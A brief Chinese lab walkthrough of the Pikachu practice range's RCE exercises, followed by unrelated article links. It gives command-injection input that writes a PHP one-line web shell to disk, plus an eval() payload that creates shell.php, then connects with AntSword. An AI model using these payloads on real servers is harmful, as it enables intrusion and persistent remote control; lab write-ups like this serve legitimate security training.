Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

相关推荐
向日葵.几秒前
linux & qnx & git 命令 2
linux·运维·git
睡不醒男孩0308231 分钟前
第四篇:数据库国产化与信创替代的守护者:基于CLup的异构数据库一站式运维平台构建
运维·数据库·金融·clup·中启乘数
Jonm1 分钟前
exsi系统使用storcli重组raid阵列(不停机)
运维·esxi·raid
极客先躯2 分钟前
高级java每日一道面试题-2026年02月04日-实战篇[Docker]-如何在容器之间共享数据?
java·运维·网络·docker·容器·自动化·高级面试题
Android系统攻城狮15 分钟前
Linux Pulseaudio深度解析之pa_context_set_sink_mute_by_index用流程与实战(四十七)
linux·运维·服务器·音频进阶·pulseaudio进阶
星幻元宇VR17 分钟前
消防教育基地展厅设备【消防知识安全竞赛系统】
人工智能·科技·学习·安全
木白CPP22 分钟前
aarch64-linux-gnu* (gcc,ld,objcopy,objdump)工具总结
linux·运维·gnu
A.说学逗唱的Coke22 分钟前
【运维专题】playbooks保姆级使用指南
运维·开发语言·python
豆是浪个24 分钟前
Linux(Centos 7.6)命令详解:xargs
linux·运维·服务器
shchojj30 分钟前
gitlab推送触发jekins编译
运维·gitlab